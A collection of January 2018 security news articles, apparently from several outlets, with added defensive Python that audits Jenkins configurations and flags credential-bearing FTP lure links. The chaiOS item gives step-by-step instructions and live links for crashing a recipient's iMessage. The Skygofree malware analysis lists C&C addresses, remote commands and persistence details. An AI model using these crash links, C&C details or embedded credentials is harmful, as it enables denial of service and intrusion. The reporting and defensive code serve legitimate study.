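SAMPLE_BODIES = [
    "Please review the attached invoice: ftp://sales:Summer2017@ftp.example-compromised.net/Invoice_0117.doc",
    "Mirror of the public dataset is at ftp://ftp.example.org/pub/data.csv - no login needed.",
    "Quarterly figures: ftp://backup@ftp.example-compromised.net/Q4.xls (password sent separately)",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        for link in credentialed_doc_links(body):
            print(f"credentialed FTP document link: {link.host}{link.path} user={link.username}")
            print("  redacted:", redact(body))
```

The redacted form is what goes into a ticket or a shared indicator feed: the credentials in the lure are the compromised site owner’s, and copying them around only widens the exposure Forcepoint describes.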


Firms More Open to Receiving Vulnerability Reports: Ethical Hackers
19.1.2018 securityweek Vulnerebility
Companies have become more open in the past year to receiving vulnerability reports from security researchers, according to ethical hackers surveyed by bug bounty platform HackerOne.

According to HackerOne’s 2018 Hacker Report, which surveyed nearly 2,000 white hat hackers across 100 countries, companies are somewhat more open (38%) or far more open (34%) to receiving vulnerability reports. Fewer than 10% of respondents said firms are less open.

On the other hand, nearly a quarter of respondents said they had not reported vulnerabilities because the affected software’s developer had not provided a channel for responsible disclosure.

When it comes to motivation, money is no longer the most important factor, as it was the previous year. More researchers hack to learn new techniques (14.7%), for fun (14%) and for the challenge (14%) than for the money (13.1%). Nearly one quarter of respondents said they donated money earned from bug bounties to charities.

A majority of HackerOne users named websites as their favorite target (70%), followed by APIs (7.5%), Android apps (4.2%), operating systems (3.1%), and IoT systems (2.6%).


Burp Suite is the favorite tool of nearly one-third of hackers, but more than 15% claim they use their own tools to find vulnerabilities. Other popular tools include web proxies and scanners, network scanners, fuzzers, and debuggers.

A vast majority of the white hats who have signed up on the HackerOne platform, which hosts the bug bounty programs of more than 1,000 organizations, are under the age of 35, and many of them learned how to hack on their own. Most of them either work in IT (software or hardware), consulting, or they are students.

Roughly 66% spend less than 20 hours per week hacking, and only 13% spend 40 hours or more. More than 71% have less than 5 years experience, and only 10% have been hacking for more than 10 years.

Over $23 million has been paid out through HackerOne, with more than $4 million paid to researchers in the U.S., $3 million to India, and $1.3 million each to Australia and Russia. The largest chunk came from companies in the United States ($16 million) and Canada ($1.2 million).

In some places, bug bounty hunters earn far more than they would as a software engineer in their country. For example, in India and Argentina they earn roughly 16 times more than the median annual wage of a software engineer, while in Hong Kong and Egypt they earn 8 times more.

A quarter of respondents said bug bounties represent at least half of their annual income and 14% said they represent 90-100% of their income. Three percent reported making more than $100,000 per year from bug bounty programs, and 1% make more than $350,000.


Misconfigured Jenkins Servers Leak Sensitive Data
19.1.2018 securityweek Analysis
A researcher has conducted an analysis of Jenkins servers and found that many of them leak sensitive information, including ones belonging to high-profile companies.

London-based researcher Mikail Tunç used the Shodan search engine to find Jenkins servers accessible from the Internet and discovered roughly 25,000 instances.

The expert analyzed approximately half of them and determined that 10-20% were misconfigured. He spent weeks manually validating the issues he discovered and notifying affected vendors.

Jenkins is an open source automation server used by software developers for continuous integration and delivery. Since the product is typically linked to a code repository such as GitHub and a cloud environment such as AWS or Azure, failure to configure the application correctly can pose a serious security risk.

Some of the misconfigured systems discovered by Tunç provided guest or administrator permissions by default, while others allowed guest or admin access to anyone who registered an account. Some Jenkins servers used a SAML/OAuth authentication system linked to GitHub or Bitbucket, but they allowed any GitHub or Bitbucket account to log in rather than just accounts owned by the organization.
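As an added example, not code from the article or from the Jenkins project, the script below audits a Jenkins config.xml for the exposure patterns Tunç describes: security switched off, open self-registration combined with full control for every logged-in user, and an external identity provider with no organisation restriction. The core element names are those Jenkins writes to $JENKINS_HOME/config.xml; the GitHub OAuth realm class name is an assumption about the github-oauth plugin, and all three configurations are constructed samples.

```python
"""Audit a Jenkins config.xml for the exposure patterns described above.

Added example, not code from the article or from the Jenkins project.
useSecurity, authorizationStrategy, securityRealm, denyAnonymousReadAccess and
disableSignup are elements Jenkins writes to $JENKINS_HOME/config.xml; the
GitHub OAuth realm class name is an assumption about the github-oauth plugin.
"""
import xml.etree.ElementTree as ET

# Constructed sample 1: anyone may sign up, and every logged-in account then
# has full control (the "anyone who registered an account" case).
OPEN_SIGNUP_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>false</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>false</disableSignup>
  </securityRealm>
</hudson>"""

# Constructed sample 2: GitHub OAuth login (class name assumed), but the
# strategy gives full control to anyone who can log in, i.e. any GitHub user.
GITHUB_ANYONE_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="org.jenkinsci.plugins.GithubSecurityRealm">
    <clientID>placeholder-client-id</clientID>
  </securityRealm>
</hudson>"""

# Constructed sample 3: local accounts only, signup closed, no anonymous read.
HARDENED_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
  </securityRealm>
</hudson>"""


def _flag(node, tag, default):
    """Read a boolean child element as lower-case text ('true'/'false')."""
    child = node.find(tag) if node is not None else None
    return (child.text or "").strip().lower() if child is not None else default


def audit_jenkins_config(xml_text):
    """Return a list of (severity, finding) tuples for one config.xml."""
    root = ET.fromstring(xml_text)
    findings = []

    if _flag(root, "useSecurity", "false") != "true":
        # Security switched off: no login at all, everyone is an administrator.
        return [("critical", "security disabled: anyone can administer the server")]

    strategy = root.find("authorizationStrategy")
    realm = root.find("securityRealm")
    strategy_cls = strategy.get("class", "") if strategy is not None else ""
    realm_cls = realm.get("class", "") if realm is not None else ""

    if strategy_cls.endswith("AuthorizationStrategy$Unsecured"):
        findings.append(("critical", "authorization strategy is 'Anyone can do anything'"))

    if strategy_cls.endswith("FullControlOnceLoggedInAuthorizationStrategy"):
        if _flag(strategy, "denyAnonymousReadAccess", "false") != "true":
            findings.append(("high", "anonymous users can read jobs, build logs and artifacts"))
        if (realm_cls.endswith("HudsonPrivateSecurityRealm")
                and _flag(realm, "disableSignup", "false") != "true"):
            findings.append(("critical", "self-registration is open and every logged-in user has full control"))
        elif realm_cls.endswith("GithubSecurityRealm"):
            # Login proves only that the user has a GitHub account, not membership
            # of the organisation; any restriction would have to come from the strategy.
            findings.append(("critical", "any GitHub account gets full control"))
    return findings


if __name__ == "__main__":
    for name, cfg in [("open signup", OPEN_SIGNUP_CONFIG),
                      ("github anyone", GITHUB_ANYONE_CONFIG),
                      ("hardened", HARDENED_CONFIG)]:
        print(name, "->", audit_jenkins_config(cfg))
```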

Tunç said a vast majority of the misconfigured Jenkins servers leaked some type of sensitive information, including credentials for private source code repositories, credentials for deployment environments (e.g. usernames, passwords, private keys and AWS tokens), and job log files that included credentials and other sensitive data.

One of the exposed Jenkins instances, which leaked sensitive tokens, belonged to Google, but the tech giant quickly addressed the issue after being informed via its bug bounty program.

The researcher also named several major UK-based companies, including Transport for London, supermarkets Sainsbury’s and Tesco, credit checking company ClearScore, educational publisher Pearson, and newspaper publisher News UK. Some of these companies allegedly exposed highly sensitive data, but Tunç said he often had difficulties in responsibly disclosing his findings.

“I want to make it absolutely clear that I did not exploit any vulnerabilities to gain access to Jenkins servers – I simply walked through the front door which was visible to the world, then told the owners to close said front door,” the researcher noted in a blog post.

While Tunç received products, vouchers and thanks for his work from the companies he alerted, misconfigured Jenkins instances can be highly problematic and some vendors have paid significant bug bounties for such security holes.

A few months ago, two researchers reported earning a total of $20,000 from Snapchat after finding exposed Jenkins instances that allowed arbitrary code execution and access to sensitive data.


Experts uncovered a new campaign abusing FTP servers to deliver Dridex Banking Trojan
19.1.2018 securityaffairs
Virus

Security researchers at Forcepoint have spotted a new spam campaign that is abusing compromised FTP servers as a repository for malicious documents and infecting users with the Dridex banking Trojan.
The Dridex banking Trojan is a long-running malware that has been continuously improved across the years.

The malicious email campaign was first noticed by Forcepoint on January 17, 2018. The messages were primarily sent to .com top-level domains (TLDs), most of them in France, the UK, and Australia.

“The sender domains used are observed to be compromised accounts. The sender names rotated around the following names, perhaps to make the emails look more convincing to unsuspecting recipients: admin@, billing@, help@, info@, mail@, no-reply@, sale@, support@, ticket@.” reads the analysis published by Forcepoint.

Attackers used at least two types of weaponized documents: a Word document abusing the DDE protocol for malware execution, and an XLS file with macro code that downloads the Dridex banking Trojan from a compromised server.

[Image: Dridex banking Trojan]

According to the experts, the attackers obtained, in some way, the login credentials of the servers compromised and used in this campaign.

“The compromised servers do not appear to be running the same FTP software; as such, it seems likely that the credentials were compromised in some other way.” states Forcepoint.

“The perpetrators of the campaign do not appear to be worried about exposing the credentials of the FTP sites they abuse, potentially exposing the already-compromised sites to further abuse by other groups. This may suggest that the attackers have an abundant supply of compromised accounts and therefore view these assets as disposable,”

The experts believe the campaign is leveraging the infamous Necurs botnet to send out the spam messages; researchers noticed that the downloaders used by the attackers are similar to those used by the botnet before.

Forcepoint highlighted that the spam volume associated with this campaign was very low compared to other Necurs campaigns: the attackers sent only 9,500 emails, a tiny number compared with the millions of emails sent through the botnet in other campaigns.

Another peculiarity of this campaign is the use of FTP servers to download the malware.

“Cybercriminals constantly update their attack methods to try and ensure maximum infection rates. In this case FTP sites were used, perhaps in an attempt to prevent being detected by email gateways and network policies that may consider FTPs as trusted locations. The presence of FTP credentials in the emails highlights the importance of regularly updating passwords,” Forcepoint concluded.
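The distinctive artefact of this campaign is an FTP download link carrying the compromised site’s credentials in the URL itself. The mail-gateway check below is an added example, not Forcepoint’s code: it assumes links of the ftp://user:password@host/path form, flags the ones that point at the Word/XLS document types used here, and runs over constructed sample messages with placeholder hosts and credentials.

```python
"""Flag e-mail bodies that carry FTP download links with embedded credentials.

Added example, not code from the Forcepoint report. The messages below are
constructed; hosts and credentials in them are placeholders.
"""
import re
from urllib.parse import urlsplit, unquote

# ftp:// URLs with a user:password@ part before the host (password may be empty).
FTP_CRED_URL = re.compile(r"ftp://[^\s/@<>\"']+:[^\s/@<>\"']*@[^\s<>\"']+", re.IGNORECASE)

# Document types seen in the campaign: DDE-abusing Word files and macro XLS files.
RISKY_EXTENSIONS = (".doc", ".docx", ".xls", ".xlsm")

SAMPLE_MESSAGES = [
    "From: billing@example.invalid\nPlease review the attached invoice: "
    "ftp://ftpuser:Passw0rd@ftp.example.invalid/pub/invoice_0117.doc",
    "From: support@example.invalid\nYour ticket has been updated. "
    "See https://tickets.example.invalid/view?id=42",
    "From: info@example.invalid\nReport: ftp://anon:guest@files.example.invalid/stats/q4.xls ...",
    "From: admin@example.invalid\nMirror: ftp://mirror.example.invalid/readme.txt",  # no credentials
]


def find_credentialed_ftp_links(body):
    """Return a dict per ftp URL with embedded credentials found in the body."""
    hits = []
    for url in FTP_CRED_URL.findall(body):
        parts = urlsplit(url)
        hits.append({
            "host": parts.hostname,
            "username": unquote(parts.username or ""),
            "has_password": parts.password is not None,
            "path": parts.path,
            # the link fetches one of the lure document types used in the campaign
            "risky_document": parts.path.lower().endswith(RISKY_EXTENSIONS),
        })
    return hits


def triage(messages):
    """Return the indexes of messages that should be held for review."""
    flagged = []
    for i, body in enumerate(messages):
        if any(h["risky_document"] for h in find_credentialed_ftp_links(body)):
            flagged.append(i)
    return flagged


if __name__ == "__main__":
    for i in triage(SAMPLE_MESSAGES):
        print(i, find_credentialed_ftp_links(SAMPLE_MESSAGES[i]))
```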

The Forcepoint report includes IoCs for this campaign.


Health South East RHF data breach exposed health records for half of Norway’s Population
19.1.2018 securityaffairs BigBrothers

On January 8, Health South East RHF, the healthcare organization that manages hospitals in Norway’s southeast region, disclosed a major security breach.
On January 8, Health South East RHF, the healthcare organization that manages hospitals in Norway’s southeast region (the counties of Østfold, Akershus, Oslo, Hedmark, Oppland, Buskerud, Vestfold, Telemark, Aust-Agder and Vest-Agder), disclosed a security breach that may have exposed sensitive data belonging to more than half of the population.

The incident was announced by the national healthcare security centre HelseCERT, which detected abnormal activity against computer systems in the region. HelseCERT reported the incident to local authorities as well as NorCERT.

“We are in a phase where we try to get an overview. It’s far too early to say how big the attack is. We are working to acquire knowledge of all aspects,” Kjetil Nilsen, director of NorCERT, the National Security Authority (NSM) told Norwegian media outlet VG.

“Everything indicates that it is an advanced player who has the tools and ability to perform such an attack. It can be advanced criminals. There is a wide range of possibilities,”

According to HelseCERT, the security breach is the result of an attack conducted by ‘advanced’ and ‘professional’ hackers.

Authorities announced important measures to limit the damage caused by the security breach.

“A number of measures have been implemented to remove the threat, and further measures will be implemented in the future,” announced Norway’s Ministry of Health and Care in a statement.

“This is a serious situation and measures have been taken to limit the damage caused by the incident,” reads a joint statement published by Health South East RHF and Sykehuspartner HF.

The hospitals in the region currently serve 2.9 million inhabitants, which corresponds to 56 percent of the overall population of 5.2 million citizens.

[Image: Norway Health South East RHF]

Health records are a precious commodity in the cybercrime underground, but are also considered by nation-state actors a mine of data that could be used in further attacks. Experts and government representatives believe that the data breach suffered by the Health South-East RHF could be the result of a cyber espionage campaign conducted by a foreign state interested in gathering data related to people who work in government, military, intelligence personnel, and politicians.

The VG newspaper reported that Health South East hired Hewlett Packard Enterprise in the autumn of 2016 to modernize computer systems in the healthcare company, but the project was suspended because NRK revealed poor control of access to patient data.

The Health South East RHF data breach appears to be unrelated to the above project, as confirmed by CEO Cathrine Lofthus.

“We have investigated that is important to us. We do not see any connection between this attack and that project,” says Lofthus.


chaiOS Bug can crash iMessage App on any iPhone and macOS with a simple link
19.1.2018 securityaffairs Apple

The software developer Abraham Masri has discovered a new bug, dubbed ‘chaiOS’ that could be exploited to crash a target’s iMessage application.
The researcher and software developer Abraham Masri has discovered a new bug, dubbed ‘chaiOS Text Bomb’, that could be exploited to crash a recipient’s iMessage application in a continuous loop.


Abraham Masri
@cheesecakeufo
👋 Effective Power is back, baby!

chaiOS bug:
Text the link below, it will freeze the recipient's device, and possibly restart it. http://iabem97.github.io/chaiOS

⚠️ Do not use it for bad stuff.
----
thanks to @aaronp613 @garnerlogan65 @lepidusdev @brensalsa for testing!

12:00 AM - Jan 17, 2018
The flaw exploited by the ‘chaiOS Text Bomb’ affects both iOS and macOS. According to researchers at Yalu Jailbreak, the bug is currently compatible up to iOS 11.1.2 firmware, which means that it affects iMessage apps on macOS High Sierra, iOS 10 to 10.3.3, and iOS 11 to 11.2.1.

The exploitation of the issue is very simple: an attacker just needs to send a link to a web page hosting JavaScript code that attempts to send an SMS message. The iMessage application fails to properly handle the code, triggering the crash of the app. In some cases, the iMessage app has been observed entering a continuous reboot loop.

A proof-of-concept page was put together by Masri and shared on Twitter yesterday; the page has since been removed from GitHub due to potential abuse, but a new mirror has already been added.

“chaiOS is a malicious iOS bug that can cause the target device to freeze, respring, drain the battery, and possibly kernel panic. It is developed by the eminent jailbreak developer, Abraham Masri.

Here are the known after-effects once someone opens the malicious link.

The stock Messages app goes completely blank.
Messages app crashes instantly after opening.
Slows down the target device.
It weighs around 7MB and loads some of the exploit into the user’s browser window and then crashes it.” states Yalu Jailbreak.

[Image: iPhone chaiOS bug]

Below is a video PoC of the exploitation of the bug:

Researchers observed that the chaiOS Text Bomb can also affect Windows systems, it can also crash Chrome and Firefox web browsers.

The download link to the chaiOS is reported on the following page, but please don’t use it.

https://yalujailbreak.net/chaios/

Below are the instructions to trigger the bug:

Open the Messages app.
Select the recipient whose device you want to crash.
Send them the aforementioned link. Be sure to include a “/” at the end.
You are done with this now. Just wait for them to open the link in Safari.


Researchers Uncover Government-Sponsored Mobile Hacking Group Operating Since 2012
19.1.2018 thehackernews Android

A global mobile espionage campaign collecting a trove of sensitive personal information from victims since at least 2012 has accidentally revealed itself—thanks to an exposed server on the open internet.
It's one of the first known examples of a successful large-scale hacking operation of mobile phones rather than computers.
The advanced persistent threat (APT) group, dubbed Dark Caracal, has claimed to have stolen hundreds of gigabytes of data, including personally identifiable information and intellectual property, from thousands of victims in more than 21 different countries, according to a new report from the Electronic Frontier Foundation (EFF) and security firm Lookout.
After mistakenly leaking some of its files to the internet, the shadowy hacking group was traced back to a building owned by the Lebanese General Directorate of General Security (GDGS), one of the country's intelligence agencies, in Beirut.
"Based on the available evidence, it's likely that the GDGS is associated with or directly supporting the actors behind Dark Caracal," the report reads.
According to the 51-page-long report [PDF], the APT group targeted "entities that a nation-state might attack," including governments, military personnel, utilities, financial institutions, manufacturing companies, defence contractors, medical practitioners, education professionals, academics, and civilians from numerous other fields.

Researchers also identified at least four different personas associated with Dark Caracal's infrastructure — i.e. Nancy Razzouk, Hassan Ward, Hadi Mazeh, and Rami Jabbour — with the help of email address op13@mail[.]com.
"The contact details for Nancy present in WHOIS information matched the public listing for a Beirut-based individual by that name. When we looked at the phone number associated with Nancy in the WHOIS information, we discovered the same number listed in exfiltrated content and being used by an individual with the name Hassan Ward."

"During July 2017, Dark Caracal’s internet service provider took the adobeair[.]net command and control server offline. Within a matter of days, we observed it being re-registered to the email address op13@mail[.]com with the name Nancy Razzouk. This allowed us to identify several other domains listed under the same WHOIS email address information, running similar server components."
Multi-Platform Cyber Espionage Campaign

Dark Caracal has been conducting multi-platform cyber-espionage campaigns and has been linked to 90 indicators of compromise (IOCs), including 11 Android malware IOCs, 26 desktop malware IOCs across Windows, Mac, and Linux, and 60 domain/IP based IOCs.
Since at least 2012, the group has run more than ten hacking campaigns aimed mainly at Android users in at least 21 countries across North America, Europe, the Middle East and Asia.
The data stolen by Dark Caracal from its targets includes documents, call records, text messages, audio recordings, secure messaging client content, browsing history, contact information, photos, and location data—basically all the information that allows the APT group to identify the person and have an intimate look at his/her life.
To get its job done, Dark Caracal did not rely on any "zero-day exploits," nor did it have to get the malware into the Google Play Store. Instead, the group used basic social engineering via posts on Facebook groups and WhatsApp messages, encouraging users to visit a website controlled by the hackers and to grant application permissions.
"One of the interesting things about this ongoing attack is that it doesn’t require a sophisticated or expensive exploit. Instead, all Dark Caracal needed was application permissions that users themselves granted when they downloaded the apps, not realizing that they contained malware," said EFF Staff Technologist Cooper Quintin.
"This research shows it’s not difficult to create a strategy allowing people and governments to spy on targets around the world."
Here's How Dark Caracal Group Infects Android Users

Once tricked into landing on the malicious websites, the victims were served fake updates to secure messenger apps, including WhatsApp, Signal, Threema, Telegram, and Orbot (an open source Tor client for Android), which eventually downloaded the Dark Caracal malware, dubbed Pallas, onto the targets' mobile devices.
Pallas is a piece of surveillance malware that's capable of taking photographs, stealing data, spying on communications apps, recording video and audio, acquiring location data, and stealing text messages, including two-factor authentication codes, from victims' devices.
"Pallas samples primarily rely on the permissions granted at the installation in order to access sensitive user data. However, there is functionality that allows an attacker to instruct an infected device to download and install additional applications or updates." report says.
"Theoretically, this means it’s possible for the operators behind Pallas to push specific exploit modules to compromised devices in order to gain complete access."
Besides its own custom malware, Dark Caracal also used FinFisher—a highly secret surveillance tool that is often marketed to law enforcement and government agencies—and a newly discovered desktop spyware tool, dubbed CrossRAT, which can infect Windows, Linux, and OS X operating systems.
"Citizen Lab previously flagged the General Directorate of General Security in a 2015 report as one of two Lebanese government organizations using the FinFisher spyware." report says.
According to the researchers, though Dark Caracal targeted macOS and Windows devices in various campaigns, at least six distinct Android campaigns were found linked to one of its servers that were left open for analysis, revealing 48GB was stolen from around 500 Android phones.
Overall, Dark Caracal successfully managed to steal more than 252,000 contacts, 485,000 text messages and 150,000 call records from infected Android devices. Sensitive data such as personal photos, bank passwords and PIN numbers were also stolen.
The best way to protect yourself from such Android-based malware attacks is to always download applications from the official Google Play Store market rather than from any third-party website.


Skygofree: Following in the footsteps of HackingTeam
19.1.2018 Kaspersky Android
Skygofree Appendix — Indicators of Compromise (PDF)
At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014. Since then, the implant’s functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals.

We observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants. These domains have been registered by the attackers since 2015. According to our telemetry, that was the year the distribution campaign was at its most active. The activities continue: the most recently observed domain was registered on October 31, 2017. Based on our KSN statistics, there are several infected individuals, exclusively in Italy.

Moreover, as we dived deeper into the investigation, we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine. The version we found was built at the beginning of 2017, and at the moment we are not sure whether this implant has been used in the wild.

We named the malware Skygofree, because we found the word in one of the domains*.

Malware Features
Android
According to the observed samples and their signatures, early versions of this Android malware were developed by the end of 2014 and the campaign has remained active ever since.

Signature of one of the earliest versions

The code and functionality have changed numerous times; from simple unobfuscated malware at the beginning to sophisticated multi-stage spyware that gives attackers full remote control of the infected device. We have examined all the detected versions, including the latest one that is signed by a certificate valid from September 14, 2017.

The implant provides the ability to grab a lot of exfiltrated data, like call records, text messages, geolocation, surrounding audio, calendar events, and other memory information stored on the device.

After manual launch, it shows a fake welcome notification to the user:

Dear Customer, we’re updating your configuration and it will be ready as soon as possible.

At the same time, it hides its icon and starts background services to hide further actions from the user.

Service Name          Purpose
AndroidAlarmManager   Uploading last recorded .amr audio
AndroidSystemService  Audio recording
AndroidSystemQueues   Location tracking with movement detection
ClearSystems          GSM tracking (CID, LAC, PSC)
ClipService           Clipboard stealing
AndroidFileManager    Uploading all exfiltrated data
AndroidPush           XMPP C&C protocol (url.plus:5223)
RegistrationService   Registration on C&C via HTTP (url.plus/app/pro/)

Interestingly, a self-protection feature was implemented in almost every service. Since in Android 8.0 (SDK API 26) the system is able to kill idle services, this code raises a fake update notification to prevent it:

Cybercriminals have the ability to control the implant via HTTP, XMPP, binary SMS and FirebaseCloudMessaging (or GoogleCloudMessaging in older versions) protocols. Such a diversity of protocols gives the attackers more flexible control. In the latest implant versions there are 48 different commands. You can find a full list with short descriptions in the Appendix. Here are some of the most notable:

‘geofence’ – this command adds a specified location to the implant’s internal database, and when it matches the device’s current location the malware triggers and begins to record surrounding audio.
‘social’ – this command starts the ‘AndroidMDMSupport’ service, which allows the files of any other installed application to be grabbed. The service name makes it clear that by applications the attackers mean MDM solutions, which are business-specific tools. The operator can specify a path to the database of any targeted application and the name of the server-side PHP script for uploading.

Several hardcoded applications targeted by the MDM-grabbing command

‘wifi’ – this command creates a new Wi-Fi connection with the configuration specified in the command and enables Wi-Fi if it is disabled, so the device connects to the established network silently and automatically. This command is used to connect the victim to a Wi-Fi network controlled by the cybercriminals to perform traffic sniffing and man-in-the-middle (MitM) attacks.

addWifiConfig method code fragments

‘camera’ – this command records a video or captures a photo using the front-facing camera when someone next unlocks the device.
Some versions of Skygofree feature a self-protection ability exclusively for Huawei devices. There is a ‘protected apps’ list in this brand’s smartphones, related to a battery-saving concept. Apps not selected as protected apps stop working once the screen is off and await re-activation, so the implant is able to determine that it is running on a Huawei device and add itself to this list. Due to this feature, it is clear that the developers paid special attention to the work of the implant on Huawei devices.

Also, we found a debug version of the implant (70a937b2504b3ad6c623581424c7e53d) that contains interesting constants, including the version of the spyware.

Debug BuildConfig with the version

After a deep analysis of all discovered versions of Skygofree, we made an approximate timeline of the implant’s evolution.

Mobile implant evolution timeline

However, some facts indicate that the APK samples from stage two can also be used separately as the first step of the infection. Below is a list of the payloads used by the Skygofree implant in the second and third stages.

Reverse shell payload
The reverse shell module is an external ELF file compiled by the attackers to run on Android. The choice of a particular payload is determined by the implant’s version, and it can be downloaded from the command and control (C&C) server soon after the implant starts, or after a specific command. In the most recent case, the choice of the payload zip file depends on the device process architecture. For now, we observe only one payload version for the following ARM CPUs: arm64-v8a, armeabi, armeabi-v7a.

Note that in almost all cases, this payload file, contained in zip archives, is named ‘setting’ or ‘setting.o’.

The main purpose of this module is providing reverse shell features on the device by connecting with the C&C server’s socket.

Reverse shell payload

The payload is started by the main module with a specified host and port as a parameter that is hardcoded to ‘54.67.109.199’ and ‘30010’ in some versions:

Alternatively, they could be hardcoded directly into the payload code:

We also observed variants that were equipped with similar reverse shell payloads directly in the main APK /lib/ path.

Equipped reverse shell payload with specific string

After an in-depth look, we found that some versions of the reverse shell payload code share similarities with PRISM – a stealth reverse shell backdoor that is available on GitHub.

Reverse shell payload from update_dev.zip

Exploit payload
At the same time, we found an important payload binary that is trying to exploit several known vulnerabilities and escalate privileges. According to several timestamps, this payload is used by implant versions created since 2016. It can also be downloaded by a specific command. The exploit payload contains following file components:

Component name                                    Description
run_root_shell/arrs_put_user.o/arrs_put_user/poc  Exploit ELF
db                                                Sqlite3 tool ELF
device.db                                         Sqlite3 database with supported devices and their constants needed for privilege escalation

‘device.db’ is a database used by the exploit. It contains two tables – ‘supported_devices’ and ‘device_address’. The first table contains 205 devices with some Linux properties; the second contains the specific memory addresses associated with them that are needed for successful exploitation. You can find a full list of targeted models in the Appendix.

Fragment of the database with targeted devices and specific memory addresses

If the infected device is not listed in this database, the exploit tries to discover these addresses programmatically.

After downloading and unpacking, the main module executes the exploit binary file. Once executed, the module attempts to get root privileges on the device by exploiting the following vulnerabilities:

CVE-2013-2094
CVE-2013-2595
CVE-2013-6282
CVE-2014-3153 (futex aka TowelRoot)
CVE-2015-3636

Exploitation process

After an in-depth look, we found that the exploit payload code shares several similarities with the public project android-rooting-tools.

Decompiled exploit function code fragment

run_with_mmap function from the android-rooting-tools project

As can be seen from the comparison, there are similar strings and also a unique comment in Italian, so it looks like the attackers created this exploit payload based on android-rooting-tools project source code.

Busybox payload
Busybox is public software that provides several Linux tools in a single ELF file. In earlier versions, it operated with shell commands like this:

Stealing WhatsApp encryption key with Busybox

Social payload
Actually, this is not a standalone payload file – in all the observed versions its code was compiled together with the exploit payload in one file (‘poc_perm’, ‘arrs_put_user’, ‘arrs_put_user.o’). This is because the implant needs to escalate privileges before performing social payload actions. This payload is also used by the earlier versions of the implant. It has similar functionality to the ‘AndroidMDMSupport’ command from the current versions – stealing data belonging to other installed applications. The payload will execute shell code to steal data from various applications. The example below steals Facebook data:

All the other hardcoded applications targeted by the payload:

Package name           Name
jp.naver.line.android  LINE: Free Calls & Messages
com.facebook.orca      Facebook Messenger
com.facebook.katana    Facebook
com.whatsapp           WhatsApp
com.viber.voip         Viber

Parser payload
Upon receiving a specific command, the implant can download a special payload to grab sensitive information from external applications. The case where we observed this involved WhatsApp.

In the examined version, it was downloaded from:

hxxp://url[.]plus/Updates/tt/parser.apk

The payload can be a .dex or .apk file, which is a Java-compiled Android executable. After downloading, it will be loaded by the main module via the DexClassLoader API:

As mentioned, we observed a payload that exclusively targets the WhatsApp messenger and it does so in an original way. The payload uses the Android Accessibility Service to get information directly from the displayed elements on the screen, so it waits for the targeted application to be launched and then parses all nodes to find text messages:

Note that the implant needs special permission to use the Accessibility Service API, but there is a command that performs a request with a phishing text displayed to the user to obtain such permission.

Windows
We have found multiple components that form an entire spyware system for the Windows platform.

Name             MD5                               Purpose
msconf.exe       55fb01048b6287eadcbd9a0f86d21adf  Main module, reverse shell
network.exe      f673bb1d519138ced7659484c0b66c5b  Sending exfiltrated data
system.exe       d3baa45ed342fbc5a56d974d36d5f73f  Surrounding sound recording by mic
update.exe       395f9f87df728134b5e3c1ca4d48e9fa  Keylogging
wow.exe          16311b16fd48c1c87c6476a455093e7a  Screenshot capturing
skype_sync2.exe  6bcc3559d7405f25ea403317353d905f  Skype call recording to MP3

All modules, except skype_sync2.exe, are written in Python and packed to binary files via the Py2exe tool. This sort of conversion allows Python code to be run in a Windows environment without pre-installed Python binaries.

msconf.exe is the main module that provides control of the implant and reverse shell feature. It opens a socket on the victim’s machine and connects with a server-side component of the implant located at 54.67.109.199:6500. Before connecting with the socket, it creates a malware environment in ‘APPDATA/myupd’ and creates a sqlite3 database there – ‘myupd_tmp\\mng.db’:

CREATE TABLE MANAGE(ID INT PRIMARY KEY NOT NULL,Send INT NOT NULL, Keylogg INT NOT NULL,Screenshot INT NOT NULL,Audio INT NOT NULL);
INSERT INTO MANAGE (ID,Send,Keylogg,Screenshot,Audio) VALUES (1, 1, 1, 1, 0 )

Finally, the malware modifies the ‘Software\Microsoft\Windows\CurrentVersion\Run’ registry key to enable autostart of the main module.

The code contains multiple comments in Italian; here is the most noteworthy example:

“Receive commands from the remote server, here you can set the key commands to command the virus”

Here are the available commands:

Name Description
cd Change current directory to specified
quit Close the socket
nggexe Execute received command via Python’s subprocess.Popen() without outputs
ngguploads Upload specified file to the specified URL
nggdownloads Download content from the specified URLs and save to specified file
nggfilesystem Dump file structure of the C: path, save it to the file in json format and zip it
nggstart_screen / nggstop_screen Enable/disable screenshot module. When enabled, it takes a screenshot every 25 seconds
nggstart_key / nggstop_key Enable/disable keylogging module
nggstart_rec / nggstop_rec Enable/disable surrounding sound recording module
ngg_status Send components status to the C&C socket
*any other* Execute received command via Python’s subprocess.Popen(), output result will be sent to the C&C socket.
All modules set hidden attributes to their files:

Module Paths Exfiltrated data format
msconf.exe %APPDATA%/myupd/gen/ %Y%m%d-%H%M%S_filesystem.zip (file structure dump)
system.exe %APPDATA%/myupd/aud/ %d%m%Y%H%M%S.wav (surrounding sounds)
update.exe %APPDATA%/myupd_tmp/txt/ and %APPDATA%/myupd/txt/ %Y%m%d-%H%M%S.txt (keylogging)
wow.exe %APPDATA%/myupd/scr/ %Y%m%d-%H%M%S.jpg (screenshots)
skype_sync2.exe %APPDATA%/myupd_tmp/skype/ and %APPDATA%/myupd/skype/ yyyyMMddHHmmss_in.mp3 and yyyyMMddHHmmss_out.mp3 (Skype call recordings)
